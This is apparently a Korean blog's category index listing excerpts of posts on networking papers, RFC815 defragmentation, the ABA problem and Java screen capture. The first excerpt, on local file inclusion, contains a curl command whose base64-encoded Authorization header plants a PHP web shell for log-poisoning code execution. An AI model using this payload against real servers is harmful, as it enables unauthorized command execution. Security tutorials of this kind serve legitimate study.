카테고리 : 학술 요약보기전체보기목록닫기

1 2 3 4 5 6 7 8 9 10 다음

Local File Inclusion – Tricks of the Trade

Local File Inclusion – Tricks of the Trade curl -H "Authorization: Basic PD9waHAgcGFzc3RocnUoJF9HRVRbJ2NtZCddKTsgPz46ZG9lc24ndCBtYXR0ZXI=" http://localhost 10.x.x.x -  <?php passthru($...

ABA Problem

ABA problem ABA Problem 에 관해 Lock-free Dynamically Resizable Arrays AtomicStampedReference

RFC815: IP Defragmentation 요약

용어 정의hole.first: 빈 공간의 첫번째 바이트 번호hole.last: 빈 공간의 마지막 바이트 번호hole descriptor: hole.first와 hole.last의 쌍hole descriptor list: hole descriptor의 목록알고리즘 개요패킷이 도착하면 hole descriptor list 조회빈 공간이 메워지는 경우 해당 ...

Click Modular Router Project

Click Modular Router Project

RouteBricks: Exploiting Parallelism To Scale Software Routers

http://www.sigops.org/sosp/sosp09/slides/dobrescu-slides-sosp09.pdf http://routebricks.org/

I/O 가상화 관련 링크

Network I/O virtualization (IOV): Key addition to PCIe in multicore designs (대략 Netronome 광고로 볼 수도 있으나 -_-) PCI SIG 중에 SR-IOV 관련 워킹 그룹이 있는데, 여기서 PCI 설정 공간을 가상화 지원할 수 있도록 확장을 좀 한 모양이다. 그런데 이게...

NetFPGA

NetFPGA 아 우리나라는 왜 이런거 안 보이지..

Exploiting Commodity Multicore Systems for Network Traffic Analysis

Exploiting Commodity Multicore Systems for Network Traffic Analysis 예전에도 ntop 문서 보고 많이 배웠는데 요새도 계속 논문 내고 있구나.. 앞부분 얘기를 보니 일부는 8259x 시리즈 이상으로 가야 적용이 되겠군.. (멀티 RX/TX 큐) Improving Network P...

IDS 테스트용 데이터

2009 Inter-Service Academy Cyber Defense Exercise dataset 우왕 굳내일 받아놔야지

자바 스크린 캡처

Robot robot = new Robot(); robot.delay(1000); BufferedImage screencapture = robot.createScreenCapture(     new Rectangle(Toolkit.getDefaultToolkit().getScreenSize())); // Save a...
1 2 3 4 5 6 7 8 9 10 다음